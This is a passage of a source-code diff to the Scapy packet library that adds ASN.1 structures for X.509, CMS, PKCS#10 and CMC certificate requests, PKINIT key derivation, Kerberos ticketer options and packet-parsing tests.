+864,8 @@ class X509_ExtOidNTDSCaSecurity(ASN1_Packet): "2.16.840.1.113730.1.1": X509_ExtNetscapeCertType, "2.16.840.1.113730.1.13": X509_ExtComment, "1.3.6.1.4.1.311.20.2": X509_ExtCertificateTemplateName, + "1.3.6.1.4.1.311.21.7": X509_ExtCertificateTemplateOID, + "1.3.6.1.4.1.311.21.10": X509_ExtCertificatePolicies, "1.3.6.1.4.1.311.25.2": X509_ExtOidNTDSCaSecurity, "1.3.6.1.5.5.7.1.1": X509_ExtAuthInfoAccess, "1.3.6.1.5.5.7.1.3": X509_ExtQcStatements, @@ -841,19 +908,84 @@ class X509_Extensions(ASN1_Packet): None, X509_Extension)) +# Aka 'ExtensionReq' in CMS +_X509_ATTRIBUTE_TYPE["1.2.840.113549.1.9.14"] = X509_Extensions + + # Public key wrapper # class X509_AlgorithmIdentifier(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( ASN1F_OID("algorithm", "1.2.840.113549.1.1.11"), - ASN1F_optional( - ASN1F_CHOICE( - "parameters", ASN1_NULL(0), - ASN1F_NULL, - ECParameters, - DomainParameters, - ) + MultipleTypeField( + [ + ( + # RFC4055: + # "The correct encoding is to omit the parameters field" + # "All implementations MUST accept both NULL and absent + # parameters as legal and equivalent encodings." + + # RFC8017: + # "should generally be omitted, but if present, it shall have a + # value of type NULL." + ASN1F_optional(ASN1F_NULL("parameters", None)), + lambda pkt: ( + pkt.algorithm.val[:19] == "1.2.840.113549.1.1." or + pkt.algorithm.val[:21] == "2.16.840.1.101.3.4.2." or + pkt.algorithm.val[:11] == "1.3.14.3.2." + ) + ), + ( + # RFC5758: + # "the encoding MUST omit the parameters field" + + # RFC8410: + # "For all of the OIDs, the parameters MUST be absent." + ASN1F_omit("parameters", None), + lambda pkt: ( + pkt.algorithm.val[:16] == "1.2.840.10045.4." or + pkt.algorithm.val in ["1.3.101.112", "1.3.101.113"] + ) + ), + # RFC5480 + ( + ASN1F_PACKET( + "parameters", + ECParameters(), + ECParameters, + ), + lambda pkt: pkt.algorithm.val == "1.2.840.10045.2.1", + ), + # RFC3279 + ( + ASN1F_PACKET( + "parameters", + DomainParameters(), + DomainParameters, + ), + lambda pkt: pkt.algorithm.val == "1.2.840.10046.2.1", + ), + # PKCS#3 + ( + ASN1F_PACKET( + "parameters", + DHParameter(), + DHParameter, + ), + lambda pkt: pkt.algorithm.val == "1.2.840.113549.1.3.1", + ), + # TripleDES + ( + ASN1F_STRING( + "parameters", + "", + ), + lambda pkt: pkt.algorithm.val == "1.2.840.113549.3.7", + ), + ], + # Default: fail, probably. This is most likely unimplemented. + ASN1F_NULL("parameters", 0), ) ) @@ -969,6 +1101,33 @@ class ECDSAPrivateKey_OpenSSL(Packet): ] +class _IssuerUtils: + def get_issuer(self): + attrs = self.issuer + attrsDict = {} + for attr in attrs: + # we assume there is only one name in each rdn ASN1_SET + attrsDict[attr.rdn[0].type.oidname] = plain_str(attr.rdn[0].value.val) # noqa: E501 + return attrsDict + + def get_issuer_str(self): + """ + Returns a one-line string containing every type/value + in a rather specific order. sorted() built-in ensures unicity. + """ + name_str = "" + attrsDict = self.get_issuer() + for attrType, attrSymbol in _attrName_mapping: + if attrType in attrsDict: + name_str += "/" + attrSymbol + "=" + name_str += attrsDict[attrType] + for attrType in sorted(attrsDict): + if attrType not in _attrName_specials: + name_str += "/" + attrType + "=" + name_str += attrsDict[attrType] + return name_str + + class X509_Validity(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( @@ -991,7 +1150,7 @@ class X509_Validity(ASN1_Packet): _attrName_specials = [name for name, symbol in _attrName_mapping] -class X509_TBSCertificate(ASN1_Packet): +class X509_TBSCertificate(ASN1_Packet, _IssuerUtils): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( ASN1F_optional( @@ -1021,31 +1180,6 @@ class X509_TBSCertificate(ASN1_Packet): X509_Extension, explicit_tag=0xa3))) - def get_issuer(self): - attrs = self.issuer - attrsDict = {} - for attr in attrs: - # we assume there is only one name in each rdn ASN1_SET - attrsDict[attr.rdn[0].type.oidname] = plain_str(attr.rdn[0].value.val) # noqa: E501 - return attrsDict - - def get_issuer_str(self): - """ - Returns a one-line string containing every type/value - in a rather specific order. sorted() built-in ensures unicity. - """ - name_str = "" - attrsDict = self.get_issuer() - for attrType, attrSymbol in _attrName_mapping: - if attrType in attrsDict: - name_str += "/" + attrSymbol + "=" - name_str += attrsDict[attrType] - for attrType in sorted(attrsDict): - if attrType not in _attrName_specials: - name_str += "/" + attrType + "=" - name_str += attrsDict[attrType] - return name_str - def get_subject(self): attrs = self.subject attrsDict = {} @@ -1105,7 +1239,7 @@ class X509_RevokedCertificate(ASN1_Packet): None, X509_Extension))) -class X509_TBSCertList(ASN1_Packet): +class X509_TBSCertList(ASN1_Packet, _IssuerUtils): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( ASN1F_optional( @@ -1125,31 +1259,6 @@ class X509_TBSCertList(ASN1_Packet): X509_Extension, explicit_tag=0xa0))) - def get_issuer(self): - attrs = self.issuer - attrsDict = {} - for attr in attrs: - # we assume there is only one name in each rdn ASN1_SET - attrsDict[attr.rdn[0].type.oidname] = plain_str(attr.rdn[0].value.val) # noqa: E501 - return attrsDict - - def get_issuer_str(self): - """ - Returns a one-line string containing every type/value - in a rather specific order. sorted() built-in ensures unicity. - """ - name_str = "" - attrsDict = self.get_issuer() - for attrType, attrSymbol in _attrName_mapping: - if attrType in attrsDict: - name_str += "/" + attrSymbol + "=" - name_str += attrsDict[attrType] - for attrType in sorted(attrsDict): - if attrType not in _attrName_specials: - name_str += "/" + attrType + "=" - name_str += attrsDict[attrType] - return name_str - class ASN1F_X509_CRL(ASN1F_SEQUENCE): def __init__(self, **kargs): @@ -1213,7 +1322,7 @@ class CMS_EncapsulatedContentInfo(ASN1_Packet): ASN1F_optional( _EncapsulatedContent_Field("eContent", None, explicit_tag=0xA0), - ) + ), ) @@ -1241,37 +1350,52 @@ class CMS_CertificateChoices(ASN1_Packet): # RFC3852 sect 10.2.4 -class CMS_IssuerAndSerialNumber(ASN1_Packet): +class CMS_IssuerAndSerialNumber(ASN1_Packet, _IssuerUtils): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - ASN1F_PACKET("issuer", X509_DirectoryName(), X509_DirectoryName), + ASN1F_SEQUENCE_OF("issuer", _default_issuer, X509_RDN), ASN1F_INTEGER("serialNumber", 0) ) -# RFC3852 sect 5.3 - +# RFC3852 sect 10.2.7 -class CMS_Attribute(ASN1_Packet): +class CMS_OtherKeyAttribute(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - ASN1F_OID("attrType", "0"), - ASN1F_SET_OF("attrValues", [], ASN1F_field("attr", None)) + ASN1F_OID("keyAttrId", "0"), + ASN1F_field("keyAttr", 0), ) +# RFC3852 sect 5.3 + + +class CMS_SubjectKeyIdentifier(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_STRING("sid", "") + + class CMS_SignerInfo(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( CMSVersion("version", 1), - ASN1F_PACKET("sid", CMS_IssuerAndSerialNumber(), CMS_IssuerAndSerialNumber), + ASN1F_CHOICE( + "sid", + CMS_IssuerAndSerialNumber(), + ASN1F_PACKET("sid", CMS_IssuerAndSerialNumber(), + CMS_IssuerAndSerialNumber), + ASN1F_PACKET("sid", CMS_SubjectKeyIdentifier(), + CMS_SubjectKeyIdentifier, + implicit_tag=0x80), + ), ASN1F_PACKET("digestAlgorithm", X509_AlgorithmIdentifier(), X509_AlgorithmIdentifier), ASN1F_optional( ASN1F_SET_OF( "signedAttrs", None, - CMS_Attribute, + X509_Attribute, implicit_tag=0xA0, ) ), @@ -1282,13 +1406,24 @@ class CMS_SignerInfo(ASN1_Packet): ASN1F_SET_OF( "unsignedAttrs", None, - CMS_Attribute, + X509_Attribute, implicit_tag=0xA1, ) ) ) +# RFC3852 sect 5.4 + +class CMS_SignedAttrsForSignature(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SET_OF( + "signedAttrs", + None, + X509_Attribute, + ) + + # RFC3852 sect 5.1 class CMS_SignedData(ASN1_Packet): @@ -1321,9 +1456,160 @@ class CMS_SignedData(ASN1_Packet): ), ) -# RFC3852 sect 3 + +# RFC3852 sect 6.2.1 + +class CMS_KeyTransRecipientInfo(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + CMSVersion("version", 0), + ASN1F_CHOICE( + "rid", + CMS_IssuerAndSerialNumber(), + ASN1F_PACKET("rid", CMS_IssuerAndSerialNumber(), + CMS_IssuerAndSerialNumber), + ASN1F_PACKET("rid", CMS_SubjectKeyIdentifier(), + CMS_SubjectKeyIdentifier, + implicit_tag=0x80), + ), + ASN1F_PACKET("keyEncryptionAlgorithm", + X509_AlgorithmIdentifier(), + X509_AlgorithmIdentifier), + ASN1F_STRING("encryptedKey", ""), + ) + + +# RFC3852 sect 6.2.2 + +class CMS_OriginatorPublicKey(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_PACKET("algorithm", + X509_AlgorithmIdentifier(), + X509_AlgorithmIdentifier), + ASN1F_BIT_STRING("publicKey", ""), + ) +class CMS_OriginatorIdentifierOrKey(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_CHOICE( + "originator", + CMS_IssuerAndSerialNumber(), + ASN1F_PACKET("issuerAndSerialNumber", CMS_IssuerAndSerialNumber(), + CMS_IssuerAndSerialNumber), + ASN1F_PACKET("subjectKeyIdentifier", CMS_SubjectKeyIdentifier(), + CMS_SubjectKeyIdentifier, + implicit_tag=0x80), + ASN1F_PACKET("originatorKey", CMS_OriginatorPublicKey(), + CMS_OriginatorPublicKey, + implicit_tag=0xA1), + ) + + +class CMS_RecipientEncryptedKey(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_PACKET("subjectKeyIdentifier", CMS_SubjectKeyIdentifier(), + CMS_SubjectKeyIdentifier), + ASN1F_optional( + ASN1F_GENERALIZED_TIME("date", ""), + ), + ASN1F_optional( + ASN1F_PACKET("other", CMS_OtherKeyAttribute(), CMS_OtherKeyAttribute), + ), + ) + + +class CMS_KeyAgreeRecipientInfo(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + CMSVersion("version", 3), + ASN1F_PACKET("originator", CMS_OriginatorIdentifierOrKey(), + CMS_OriginatorIdentifierOrKey, + explicit_tag=0xA0), + ASN1F_optional( + ASN1F_STRING("ukm", None, "", + explicit_tag=0x81), + ), + ASN1F_PACKET("keyEncryptionAlgorithm", + X509_AlgorithmIdentifier(), + X509_AlgorithmIdentifier), + ASN1F_SEQUENCE_OF("recipientEncryptedKeys", [], CMS_RecipientEncryptedKey), + ) + + +# RFC3852 sect 6.2 + +class CMS_RecipientInfo(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_CHOICE( + "recipientInfo", + CMS_KeyTransRecipientInfo(), + ASN1F_PACKET("ktri", CMS_KeyTransRecipientInfo(), CMS_KeyTransRecipientInfo), + ASN1F_PACKET("kari", CMS_KeyAgreeRecipientInfo(), CMS_KeyAgreeRecipientInfo, + implicit_tag=0xA1), + ) + + +# RFC3852 sect 6.1 + +class CMS_OriginatorInfo(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_optional( + ASN1F_SET_OF( + "certs", + None, + CMS_CertificateChoices, + implicit_tag=0xA0, + ) + ), + ASN1F_optional( + ASN1F_SET_OF( + "crls", + None, + CMS_RevocationInfoChoice, + implicit_tag=0xA1, + ) + ), + ) + + +class CMS_EncryptedContentInfo(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_OID("contentType", "1.2.840.113549.1.7.2"), + ASN1F_PACKET("contentEncryptionAlgorithm", + X509_AlgorithmIdentifier(), + X509_AlgorithmIdentifier), + ASN1F_optional( + ASN1F_STRING("encryptedContent", "", + implicit_tag=0x80), + ) + ) + + +class CMS_EnvelopedData(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + CMSVersion("version", 1), + ASN1F_optional( + ASN1F_PACKET("originatorInfo", None, CMS_OriginatorInfo, + implicit_tag=0xA0), + ), + ASN1F_SET_OF("recipientInfos", CMS_RecipientInfo(), CMS_RecipientInfo), + ASN1F_PACKET("encryptedContentInfo", CMS_EncryptedContentInfo(), + CMS_EncryptedContentInfo), + ASN1F_optional( + ASN1F_SET_OF("unprotectedAttrs", [], X509_Attribute, + implicit_tag=0xA1), + ) + ) + + +# RFC3852 sect 3 + class CMS_ContentInfo(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( @@ -1334,13 +1620,214 @@ class CMS_ContentInfo(ASN1_Packet): ASN1F_PACKET("content", None, CMS_SignedData, explicit_tag=0xA0), lambda pkt: pkt.contentType.oidname == "id-signedData" - ) + ), + ( + ASN1F_PACKET("content", None, CMS_EnvelopedData, + explicit_tag=0xA0), + lambda pkt: pkt.contentType.oidname == "id-envelopedData" + ), ], ASN1F_BIT_STRING("content", "", explicit_tag=0xA0) ) ) +##################### +# CSR packets # +##################### + +# based on PKCS#10 # + + +class PKCS10_CertificationRequestInfo(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("version", 0), + ASN1F_SEQUENCE_OF("subject", _default_subject, X509_RDN), + ASN1F_PACKET("subjectPublicKeyInfo", + X509_SubjectPublicKeyInfo(), + X509_SubjectPublicKeyInfo), + ASN1F_SET_OF("attributes", [], X509_Attribute, + implicit_tag=0xA0), + ) + + get_subject = X509_TBSCertificate.get_subject + get_subject_str = X509_TBSCertificate.get_subject_str + + +class PKCS10_CertificationRequest(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_PACKET("certificationRequestInfo", PKCS10_CertificationRequestInfo(), + PKCS10_CertificationRequestInfo), + ASN1F_PACKET("signatureAlgorithm", X509_AlgorithmIdentifier(), + X509_AlgorithmIdentifier), + ASN1F_BIT_STRING("signature", ASN1F_BIT_STRING("", "")), + ) + + +# based on CMC # + +# RFC 5272 sect 3.2.1.1 + +class CMC_TaggedAttribute(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("bodyPartID", 0), + ASN1F_OID("type", "0"), # attrType for compat + ASN1F_SET_OF("attrValues", [], X509_AttributeValue), + ) + + +# RFC 5272 sect 3.2.1.2.1 + +class CMC_TaggedCertificationRequest(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("bodyPartID", 0), + ASN1F_PACKET("certificationRequest", PKCS10_CertificationRequest(), + PKCS10_CertificationRequest) + ) + + +# RFC 5272 sect 3.2.1.2 + +class CMC_TaggedRequest(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_CHOICE( + "request", CMC_TaggedCertificationRequest(), + ASN1F_PACKET("tcr", CMC_TaggedCertificationRequest(), + CMC_TaggedCertificationRequest, + implicit_tag=0xA0), + # XXX there are others + ) + + +# RFC 5272 sect 3.2.1.3 + +class CMC_TaggedContentInfo(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("bodyPartID", 0), + ASN1F_PACKET("contentInfo", CMS_ContentInfo(), + CMS_ContentInfo) + ) + + +# RFC 5272 sect 3.2.1.4 + +class CMC_OtherMsg(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("bodyPartID", 0), + ASN1F_OID("otherMsgType", "0"), + ASN1F_field("otherMsgValue", ""), + ) + + +# RFC 5272 sect 3.2.1 + +class CMC_PKIData(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_SEQUENCE_OF("controlSequence", [], CMC_TaggedAttribute), + ASN1F_SEQUENCE_OF("reqSequence", [], CMC_TaggedRequest), + ASN1F_SEQUENCE_OF("cmsSequence", [], CMC_TaggedContentInfo), + ASN1F_SEQUENCE_OF("otherMsgSequence", [], CMC_OtherMsg), + ) + + +_CMS_ENCAPSULATED["1.3.6.1.5.5.7.12.2"] = CMC_PKIData + + +# Windows extensions # + +# https://learn.microsoft.com/en-us/windows/win32/seccertenroll/cmc-extensions + +class CMC_AddExtensions(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("pkiDataReference", 0), + ASN1F_SEQUENCE_OF("certReferences", [], ASN1F_INTEGER), + ASN1F_PACKET("extensions", X509_Extensions(), X509_Extensions), + ) + + +_X509_ATTRIBUTE_TYPE["1.3.6.1.5.5.7.7.8"] = CMC_AddExtensions + + +# https://learn.microsoft.com/en-us/windows/win32/seccertenroll/cmc-attributes + +class CMC_AddAttributes(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("pkiDataReference", 0), + ASN1F_SEQUENCE_OF("certReferences", [], ASN1F_INTEGER), + ASN1F_SET_OF("attributes", X509_Attribute(), X509_Attribute), + ) + + +_X509_ATTRIBUTE_TYPE["1.3.6.1.4.1.311.10.10.1"] = CMC_AddAttributes + + +# [MS-WCCE] sect 2.2.2.7.2 + +class CMC_ENROLLMENT_CSP_PROVIDER(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("KeySpec", 0), + ASN1F_BMP_STRING("ProviderName", ""), + ASN1F_BIT_STRING("Signature", ""), + ) + + +_X509_ATTRIBUTE_TYPE["1.3.6.1.4.1.311.13.2.2"] = CMC_ENROLLMENT_CSP_PROVIDER + + +# [MS-WCCE] sect 2.2.2.7.4 + +class CMC_REQUEST_CLIENT_INFO(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("clientId", 0), + ASN1F_UTF8_STRING("MachineName", ""), + ASN1F_UTF8_STRING("UserName", ""), + ASN1F_UTF8_STRING("ProcessName", ""), + ) + + +_X509_ATTRIBUTE_TYPE["1.3.6.1.4.1.311.21.20"] = CMC_REQUEST_CLIENT_INFO + + +# [MS-WCCE] sect 2.2.2.7.10 + +class CMC_EnrollmentNameValuePair(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_BMP_STRING("Name", ""), + ASN1F_BMP_STRING("Value", ""), + ) + + +_X509_ATTRIBUTE_TYPE["1.3.6.1.4.1.311.13.2.1"] = CMC_EnrollmentNameValuePair + + +# [MS-WCCE] sect 2.2.2.7.12 + +class CMC_ENROLL_ATTESTATION_STATEMENT(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_STRING_ENCAPS("kas", KeyAttestationStatement(), + KeyAttestationStatement) + + +_X509_ATTRIBUTE_TYPE["1.3.6.1.4.1.311.21.24"] = CMC_ENROLL_ATTESTATION_STATEMENT + + +# [MS-WCCE] sect 2.2.2.7.13 + +_X509_ATTRIBUTE_TYPE["1.3.6.1.4.1.311.21.23"] = CMS_ContentInfo + + ############################# # OCSP Status packets # ############################# diff --git a/scapy/libs/rfc3961.py b/scapy/libs/rfc3961.py index ed6581ceaff..e07d00c1df9 100644 --- a/scapy/libs/rfc3961.py +++ b/scapy/libs/rfc3961.py @@ -1445,3 +1445,35 @@ def prfplus(key, pepper): ) ), ) + + +############ +# RFC 4556 # +############ + +def octetstring2key(etype: EncryptionType, x: bytes) -> Key: + """ + RFC4556 octetstring2key:: + + octetstring2key(x) == random-to-key(K-truncate( + SHA1(0x00 | x) | + SHA1(0x01 | x) | + SHA1(0x02 | x) | + ... + )) + """ + try: + ep = _enctypes[etype] + except ValueError: + raise ValueError("Unknown etype '%s'" % etype) + + out = b"" + count = 0 + while len(out) < ep.keysize: + out += Hash_SHA().digest(struct.pack("!B", count) + x) + count += 1 + + return Key.random_to_key( + etype=etype, + seed=out[:ep.keysize], + ) diff --git a/scapy/modules/ticketer.py b/scapy/modules/ticketer.py index 87c591753bc..8f8e9bfdd6c 100644 --- a/scapy/modules/ticketer.py +++ b/scapy/modules/ticketer.py @@ -850,7 +850,7 @@ def get_cred(self, principal, etype=None): "Note principals are case sensitive, as on ktpass.exe" ) - def ssp(self, i): + def ssp(self, i, **kwargs): """ Create a KerberosSSP from a ticket or from the keystore. @@ -859,18 +859,31 @@ def ssp(self, i): """ if isinstance(i, int): ticket, sessionkey, upn, spn = self.export_krb(i) - return KerberosSSP( - ST=ticket, - KEY=sessionkey, - UPN=upn, - SPN=spn, - ) + if spn.startswith("krbtgt/"): + # It's a TGT + kwargs.setdefault("SPN", None) # Use target_name only + return KerberosSSP( + TGT=ticket, + KEY=sessionkey, + UPN=upn, + **kwargs, + ) + else: + # It's a ST + return KerberosSSP( + ST=ticket, + KEY=sessionkey, + UPN=upn, + SPN=spn, + **kwargs, + ) elif isinstance(i, str): spn = i key = self.get_cred(spn) return KerberosSSP( SPN=spn, KEY=key, + **kwargs, ) else: raise ValueError("Invalid 'i' value. Must be int or str") @@ -2424,6 +2437,9 @@ def request_tgt( fast=False, armor_with=None, spn=None, + x509=None, + x509key=None, + p12=None, **kwargs, ): """ @@ -2458,6 +2474,9 @@ def request_tgt( armor_ticket_upn=armor_ticket_upn, armor_ticket_skey=armor_ticket_skey, spn=spn, + x509=x509, + x509key=x509key, + p12=p12, **kwargs, ) if not res: @@ -2570,3 +2589,10 @@ def renew(self, i, ip=None, additional_tickets=[], **kwargs): return self.import_krb(res, _inplace=i) + + def iter_tickets(self): + """ + Iterate through the tickets in the ccache + """ + for i in range(len(self.ccache.credentials)): + yield self.export_krb(i) diff --git a/test/configs/cryptography.utsc b/test/configs/cryptography.utsc index 53b307d2897..4963fc71438 100644 --- a/test/configs/cryptography.utsc +++ b/test/configs/cryptography.utsc @@ -4,6 +4,7 @@ "test/scapy/layers/dot11.uts", "test/scapy/layers/ipsec.uts", "test/scapy/layers/kerberos.uts", + "test/scapy/layers/ntlm.uts", "test/scapy/layers/msnrpc.uts", "test/scapy/layers/tls/cert.uts", "test/scapy/layers/tls/tls*.uts" @@ -15,7 +16,6 @@ "test/scapy/layers/tls/*.uts": "load_layer(\"tls\")" }, "kw_ko": [ - "mock", "needs_root" ] } diff --git a/test/contrib/ikev2.uts b/test/contrib/ikev2.uts index 9d51493daa1..21ef35fdfda 100644 --- a/test/contrib/ikev2.uts +++ b/test/contrib/ikev2.uts @@ -781,7 +781,7 @@ frames = [ subjectPublicKeyInfo=X509_SubjectPublicKeyInfo( signatureAlgorithm=X509_AlgorithmIdentifier( algorithm=ASN1_OID('ecPublicKey'), - parameters=ASN1_OID('prime256v1')), + parameters=ECParameters(curve=ASN1_OID('prime256v1'))), subjectPublicKey=ECDSAPublicKey( ecPoint=ASN1_BIT_STRING( '000001001011011101000101011100101010000110110101110111010001110' @@ -1125,7 +1125,7 @@ frames = [ subjectPublicKeyInfo=X509_SubjectPublicKeyInfo( signatureAlgorithm=X509_AlgorithmIdentifier( algorithm=ASN1_OID('ecPublicKey'), - parameters=ASN1_OID('prime256v1') + parameters=ECParameters(curve=ASN1_OID('prime256v1')), ), subjectPublicKey=ECDSAPublicKey( ecPoint=ASN1_BIT_STRING( diff --git a/test/contrib/send.uts b/test/contrib/send.uts index 80d892c0f02..c4ab0ee09cd 100644 --- a/test/contrib/send.uts +++ b/test/contrib/send.uts @@ -10,7 +10,7 @@ assert pkt[ICMPv6NDOptRsaSig].signature_pad == b"\x01" * 12 = ICMPv6NDOptCGA build and dissection -pkt = Ether()/IPv6()/ICMPv6ND_NS()/ICMPv6NDOptCGA(CGA_PARAMS=CGA_Params()) +pkt = Ether()/IPv6()/ICMPv6ND_NS()/ICMPv6NDOptCGA(CGA_PARAMS=CGA_Params(pubkey=X509_SubjectPublicKeyInfo(signatureAlgorithm=X509_AlgorithmIdentifier(parameters=0)))) pkt = Ether(raw(pkt)) assert ICMPv6NDOptCGA in pkt diff --git a/test/scapy/layers/dcerpc.uts b/test/scapy/layers/dcerpc.uts index e496b68719c..27e4d4a9f5c 100644 --- a/test/scapy/layers/dcerpc.uts +++ b/test/scapy/layers/dcerpc.uts @@ -878,6 +878,7 @@ rpcserver = MyRPCServer.spawn( iface=conf.loopback_name, port=12345, bg=True, + debug=4, ) = Functional: Connect to it with DCERPC_Client over NCACN_NP @@ -886,7 +887,7 @@ client = DCERPC_Client( DCERPC_Transport.NCACN_NP, ndr64=False, ) -client.connect(get_if_addr(conf.loopback_name), port=12345) +client.connect(get_if_addr(conf.loopback_name), port=12345, smb_kwargs={"debug": 4}) client.open_smbpipe("wkssvc") client.bind(find_dcerpc_interface("wkssvc")) @@ -931,6 +932,7 @@ rpcserver = MyRPCServer.spawn( ssp=ssp, port=12345, bg=True, + debug=4, ) = Functional: Connect to it with DCERPC_Client over NCACN_NP with NTLMSSP @@ -940,7 +942,7 @@ client = DCERPC_Client( ssp=ssp, ndr64=False, ) -client.connect(get_if_addr(conf.loopback_name), port=12345, smb_kwargs={"debug": 5}) +client.connect(get_if_addr(conf.loopback_name), port=12345, smb_kwargs={"debug": 4}) client.open_smbpipe("wkssvc") client.bind(find_dcerpc_interface("wkssvc")) diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index 0080964f995..9f6607bb076 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -32,6 +32,38 @@ assert pkt.root.eData.seq[3].padataValue == b"MIT" etype_info2 = pkt.root.eData.seq[1] assert etype_info2.padataValue.seq[0].salt == b'SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com' += Parse KRB-ERROR (2) + +# This one is a preauth one + +pkt = KerberosTCPHeader(b'\x00\x00\x01A~\x82\x01=0\x82\x019\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x1e\xa4\x11\x18\x0f20251213001046Z\xa5\x05\x02\x03\x05F\x1f\xa6\x03\x02\x01\x19\xa9\x0e\x1b\x0cDOMAIN.LOCAL\xaa!0\x1f\xa0\x03\x02\x01\x02\xa1\x180\x16\x1b\x06krbtgt\x1b\x0cdomain.local\xac\x81\xda\x04\x81\xd70\x81\xd40t\xa1\x03\x02\x01\x13\xa2m\x04k0i0/\xa0\x03\x02\x01\x12\xa1(\x1b&DOMAIN.LOCALhostcomputer1.domain.local0/\xa0\x03\x02\x01\x11\xa1(\x1b&DOMAIN.LOCALhostcomputer1.domain.local0\x05\xa0\x03\x02\x01\x170;\xa1\x03\x02\x01o\xa24\x042000\x0b\x06\t`\x86H\x01e\x03\x04\x02\x030\x0b\x06\t`\x86H\x01e\x03\x04\x02\x020\x0b\x06\t`\x86H\x01e\x03\x04\x02\x010\x07\x06\x05+\x0e\x03\x02\x1a0\t\xa1\x03\x02\x01\x02\xa2\x02\x04\x000\t\xa1\x03\x02\x01\x10\xa2\x02\x04\x000\t\xa1\x03\x02\x01\x0f\xa2\x02\x04\x00') + +assert Kerberos in pkt +assert len(pkt.root.eData.seq) == 5 +assert isinstance(pkt.root.eData.seq[0].padataValue, ETYPE_INFO2) +assert pkt.root.eData.seq[0].padataValue.seq[0].salt.val == b"DOMAIN.LOCALhostcomputer1.domain.local" +assert isinstance(pkt.root.eData.seq[1].padataValue, TD_CMS_DIGEST_ALGORITHMS) +assert [x.algorithm.oidname for x in pkt.root.eData.seq[1].padataValue.seq] == [ + "sha512", + "sha384", + "sha256", + "sha1", +] +assert pkt.root.eData.seq[2].padataType == 2 + += Parse KRB-ERROR (3) + +# This is a TKT EXPIRED + +pkt = KerberosTCPHeader(b'\x00\x00\x00{~y0w\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x1e\xa4\x11\x18\x0f20251213001312Z\xa5\x05\x02\x03\r\xae\x86\xa6\x03\x02\x01 \xa9\x0e\x1b\x0cDOMAIN.LOCAL\xaa!0\x1f\xa0\x03\x02\x01\x02\xa1\x180\x16\x1b\x06krbtgt\x1b\x0cDOMAIN.LOCAL\xac\x19\x04\x170\x15\xa1\x03\x02\x01\x03\xa2\x0e\x04\x0c3\x01\x00\xc0\x00\x00\x00\x00\x01\x00\x00\x00') + +assert Kerberos in pkt +assert pkt.root.errorCode == 0x20 +assert pkt.root.sname.nameString == [b"krbtgt", b"DOMAIN.LOCAL"] +assert isinstance(pkt.root.eData, KERB_ERROR_DATA) +assert pkt.root.eData.dataValue.status == 0xc0000133 +assert pkt.root.eData.dataValue.flags == 1 + = Parse AS-REP pkt = 